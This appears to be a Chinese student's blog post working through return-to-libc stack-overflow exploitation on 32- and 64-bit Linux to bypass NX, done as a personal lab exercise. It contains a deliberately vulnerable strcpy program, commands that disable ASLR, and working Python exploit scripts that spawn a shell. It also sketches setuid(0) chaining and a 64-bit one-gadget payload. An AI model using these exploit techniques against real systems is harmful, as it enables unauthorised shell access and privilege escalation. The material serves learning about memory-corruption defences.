栈溢出学习(二)Return2Libc

跟随教程https://sploitfun.wordpress.com/2015/

此次实验参考https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/

又看到一个好的博客,也是栈溢出系列:https://www.ret2rop.com/2018/08/return-to-libc.html

NX保护机制

​ NX保护机制原则为可写与可执行互斥,这就导致我们之前在栈上的shellcode不可以被执行,因此我们采用return2libc进行攻击

实验环境

​ Ubuntu12.04

漏洞代码:

 //vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256]; /* [1] */ 
 strcpy(buf,argv[1]); /* [2] */
 printf("%s\n",buf); /* [3] */
 fflush(stdout);  /* [4] */
 return 0;
}

较于之前的漏洞代码,增加了fflush函数的调用,主要是为了向我们提供sh字符串。

编译命令

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c

去除了-z execstack这一编译命令,表示开启NX保护机制。

我们可以用一下命令来查看栈上代码是否可执行

$ readelf -l vuln
...
Program Headers:
 Type      Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
 PHDR      0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4
 INTERP    0x000154 0x08048154 0x08048154 0x00013 0x00013 R 0x1
 [Requesting program interpreter: /lib/ld-linux.so.2]
 LOAD      0x000000 0x08048000 0x08048000 0x00678 0x00678 R E 0x1000
 LOAD      0x000f14 0x08049f14 0x08049f14 0x00108 0x00118 RW 0x1000
 DYNAMIC   0x000f28 0x08049f28 0x08049f28 0x000c8 0x000c8 RW 0x4
 NOTE      0x000168 0x08048168 0x08048168 0x00044 0x00044 R 0x4
 ...
 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
 GNU_RELRO 0x000f14 0x08049f14 0x08049f14 0x000ec 0x000ec R 0x1
$

可以看到GNU_STACK权限字段没有X(X表示可执行)。如果安装了gdb peda插件,我们可以用checksec命令查看该代码的保护机制:

image-20201022220534961

Return2Libc思想

​ 为了绕过NX保护机制,我们此次采用Return2Libc技术,主要思想就是之前的return address改成我们shellcode的起始地址,但那个是属于栈地址,现在我们找一个可执行的函数,把他的地址放在return address那里,如果需要的话,再给他传个参数,通常这个函数我们用libc里面的函数,如system、execv等,此次我们通过调用system(’/bin/sh’)函数来获取shell权限。

​ 本次攻击需要以下三步:

  • 找到buf起始地址到返回地址的空间大小

    参见栈溢出学习(一)

  • 找到system的地址

    • 找到libc起始地址和system偏移地址

      • libc起始地址

        • ldd vuln找到libc起始地址(错误方法)

          image-20201022231145154

        • 如果装了gdb peda,在gdb中运行vmmap(需要先运行起来程序,即gdb中输入run运行)

          image-20201022231648629

        • 如果没有装gdb peda,在gbd中运行info proc map,或者通过info inferior,查看当前运行进程的pid(也有的教程说p getpid()查看,但是在我的机器中不好使),然后shell cat /proc/进程pid/maps查看

        其实可以看到ldd得到的起始地址 + 偏移地址和第二个方法直接得到的system地址不一致,原因ldd得到的起始地址往往是错误的。

        通常我们在gdb-peda中使用vmmap(也要先运行程序)或者gdb中如果没有插件在gdb中info proc mapping查看动态链接库地址,他的起始地址为0xb7e20000,加上上一步read -s得到的偏移地址0x0003f460,就等于下面p system直接得到的0xb7e5f460啦。

      • readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

        image-20201022231217676

    • 通过gdb直接找到system地址(注意需要先运行程序)

      gdb-peda$ p system
      $1 = {<text variable, no debug info>} 0xb7e5f460 <system>
      

      image-20201022231335364

  • 找到参数"/bin/sh"的地址

    • 暴力搜索

      (gdb) x/500s $esp在栈中找一下"/bin/sh"字段,可以找到存在"/bin/bash"字段。

      image-20201022232940087

      SHELL=占了6个字节,因此我们"/bin/bash"起始地址为0xbffff581

      但这个地址对我不管用🤣

    • export 环境变量

      $ export pwn_sh="/bin/sh"
      $ echo $pwn_sh
      $ ./gtenv pwn_sh		
      

      这个是别的教程给的,但是./gtenv我没有办法运行,又在其他教程中看到自己编写C程序,获取环境变量地址

      #!cpp
      #include <stdio.h>
      #include <stdlib.h>
      
      int main(int argc, char *argv[]) {
          char *addr;
          addr = getenv(argv[1]);
          printf("%s is located at %p\n", argv[1], addr);
          return 0;
      }
      

      我们可以运行该程序```./a.out pwn_sh

      image-20201022233807357

      但是这个地址还是没成功😂

    • 直接在libc中寻找"/bin/sh"字段

      • find "/bin/sh"

      image-20201022234621904

      ​ 第一个在libc中的可以使用,但是第二个在栈中的不可以使用(我一直觉得栈中的东西不靠谱,可能和调试的时候栈地址和实际运行是栈地址的不同导致的吧)。

      • 有的教程用这个命令找到searchmem "/bin/sh" libc,但是我没找到😂

      • 还有的教程先用指令 strings -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"找到"/bin/sh"的偏移地址,然后和刚才vmmap找到的起始地址相加,获取libc中"/bin/sh"的地址

        image-20201022235550731

        可以通过gdb调试查看0xb7e20000+0x161ff8地址处确实存放"/bin/sh"

        image-20201022235735164

        0xb7e20000+0x161ff8 = 0xb7f81ff8(和我们find "/bin/sh"找到的libc中地址一样)

开始利用漏洞

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

#Since ALSR is disabled, libc base address would remain constant and hence we can easily find the function address we want by adding the offset to it. 
#For example system address = libc base address + system offset
#where 
       #libc base address = 0xb7e22000 (Constant address, it can also be obtained from vmmap)
       #system offset     = 0x0003f060 (obtained from "readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system")
# libc_base_address = 0xb7e20000 
# system_offset = 0x0003f460
# exit_offset = 0x00032fe0

# system = libc_base_address + system_offset        #0xb7e2000+0x0003f060
system = 0xb7e5f460
# exit = libc_base_address + exit_offset          #0xb7e2000+0x00032be0
exit = 0xb7e52fe0

#system_arg points to 'sh' substring of 'fflush' string. 
#To spawn a shell, system argument should be 'sh' and hence this is the reason for adding line [4] in vuln.c. 
#But incase there is no 'sh' in vulnerable binary, we can take the other approach of pushing 'sh' string at the end of user input!!
system_arg = 0xb7f81ff8     #(obtained from hexdump output of the binary)

#endianess conversion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 268
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln", buf])

成功截图

image-20201023000420796

思考:

  • ldd显示的基地址然后加上偏移和p system地址不一致

    看了一通解释,码住了一个看不太懂链接:https://reverseengineering.stackexchange.com/questions/6657/why-does-ldd-and-gdb-info-sharedlibrary-show-a-different-library-base-addr

    反正ldd不可信就完事了。

    image-20201024102240673

  • ldd的动态链接库和vmmap显示的动态库不一样

    ldd链接出来的/lib/i386-linux-gnu/libc.so.6只是vmmap中libc-2.15.so的符号链接罢了

    image-20201023200316288

    以下内容摘取:https://stackoverflow.com/questions/13790973/what-is-the-difference-between-lib-i386-linux-gnu-libc-so-6-lib-x86-64-linux

    This is not a library, but a linker script file, which refers to the above symlinks.

    Why do we need all these:

    First, regardless of libc version installed, the linker will always search for libc.so, because the compiler driver will always pass to the linker the -lc options. The name libc stays the same and denotes to most recent version of the library.

    The symlinks libc.so.6 are named after the soname of the library, which, more or less corresponds to the ABI version of the library. The executables, linked against libc.so in fact contain runtime dependencies on libc.so.6.

    If we imagine the someday a grossly ABI incompatible libc is released, it’s soname could be named libc.so.7, for example and this version coukld coexists with the older libc.so.6 version, thus executables linked against one or the other can coexist in the same system,

    And finally, the name libc-2.15.so refers to the libc release, when you install a new libc package, the name will change to libc-2.16.so. Provided that it is binary compatible with the previous release, the libc.so.6 link will stay named that way and the existing executables will continue to work.

  • /bin/sh怎么找

    最好不用栈上的"/bin/sh",直接在libc里面找,不开ASLR,其地址是确定的。

  • 调试地址和真实运行地址不一样疑惑点

    GDB加入了一些调试信息或者环境变量的东西,导致内存格局不一样

    如果在python脚本中使用gdb.attach(r)这种语句,显示的esp地址应该就是一致的(尚未证实)

Modern 32 bit ELF Binary

参考链接:https://www.ret2rop.com/2018/08/return-to-libc.html

实验环境

​ Ubuntu18.04

在64位机器上编译32位二进制文件,生成的代码和我们直接在32位机器上编译的不一样,而且我们需要下载gcc-multilib包(apt install具体命令忘记了😄)

主要是解决push cx和pop cx的问题,我们可以通过覆盖ecx的值,使其指向system的地址+4,等到lea esp,[ecx - 0x4]时使其指向esp指向system地址,ret时,system地址装载到rip中执行system函数

image-20201028214834323

如何知道在gdb中和gdb外面栈指针的偏移量

#include<stdio.h> 
int main() 
{ 
  int a; 
  printf("%p\n",&a); 
  return 0; 
}

​ 在gdb内和外分别执行该程序,然后计算两者地址的偏移,就可以大概得到esp在gdb外和内的偏移,然后分别以不同的偏移量执行程序,暴力破解。

image-20201028215903952

from struct import pack
from subprocess import call
junk='A'*100
system=pack("I",0xf7e22d60)        #convert address to little endian
exit=pack("I",0xf7e16070)
sh=pack("I",0xf7f5c311)
for i in range(0x3b,0x4a):         #just a rough range
    ecx=pack("I",0xffffd248+i)
    payload = junk + ecx + system + exit + sh
    print hex(i)                   #prints exact offset
	call(['./buf',payload])

为什么gdb运行获取shell权限执行两次:

Great we got shell. If you are wondering why it executed /bin/dash two times, it’s because system function actually executes command in format “/bin/sh -c ”. Here command is /bin/sh. You can read man page of system for more info. Execute it outside gdb.

提权

想要提权的话,需要调用setuid(0)函数,但是我们得解决传入0的问题,调用四次gets函数,在setuid参数位置传0,但是这就涉及到chain libc,就是你要给每个libc函数传递参数,第二个libc的地址要放在第一个libc的返回地址处,那么第三个libc就会占据第一个libc的第一个参数位置,而且他们的参数位置也会互相冲突(如果不止一个的话),所以我们需要找到一些gadget,用pop来移动esp位置,移动到下一个libc的起始位置,栈布局如下:

img

实验效果:在gdb中总是报错,然后我在gdb外运行,成功获取shell权限,但是获取不到root权限,setuid(0)可能不起作用。

Modern 64 bit linux

32 bit return to libc was pretty easy, it got little trickier in getting root where you have to set null bytes as argument for setuid. Somehow we did that too. ROP exploitation on 64 bit can make you go nuts at start with functions like strcpy which don’t copy null bytes. Why ? It’s because of current 48-bit implementation of Canonical form addresses. Read more about it here. 64 bits can provide 264 bytes (16 EB) of virtual address space. However currently only the least significant 48 bits of a virtual address are actually used in address translation. That means addresses from '0000 0000 0000 0000' to '0000 7fff ffff ffff'. So in order to chain instructions we need to fill next 8 bytes on stack with return address which has 2 null bytes at start. 8 bytes because it’s 64 bit and it will read next 8 bytes for return address. So chaining isn’t possible with functions like strcpy as the chain will break with null bytes in input. It still can be done with bugs like format string exploit which we will learn in future posts or having functions like read(), memcpy(), etc. in code which can copy nullbytes. Okay. So strcpy stops at nullbytes. And we don’t have any functions in code which will copy null bytes. That means we can only make it return to just one address. We now need to find one address with such rop-gadget that executes the shell for us.

image-20201029002917359

由于有null byte的存在,我们null byte后面的内容都会被截断(如果是strcpy),所以我们只能覆盖一次返回地址,可以使用rop在libc中找到一个执行excev("/bin/sh", 0 ,0)的gadget,找到后,将地址放到返回地址处,即可。

如果是read(), memcpy()函数,

```payload = junk + poprdi + null + setuid + onegadget````

可以使用上面的payload进行攻击,由于64位是前六个参数使用寄存器rdi、rsi、rdx、rcx、r8、r9寄存器进行传递,所以我们需要找到一个gadget来将rdi设为0,然后调用setuid函数,最后再调用我们的libc函数。

QianLong Sang
QianLong Sang
Second Year CS Phd

My research interests include operating system, computer architecture and computer security.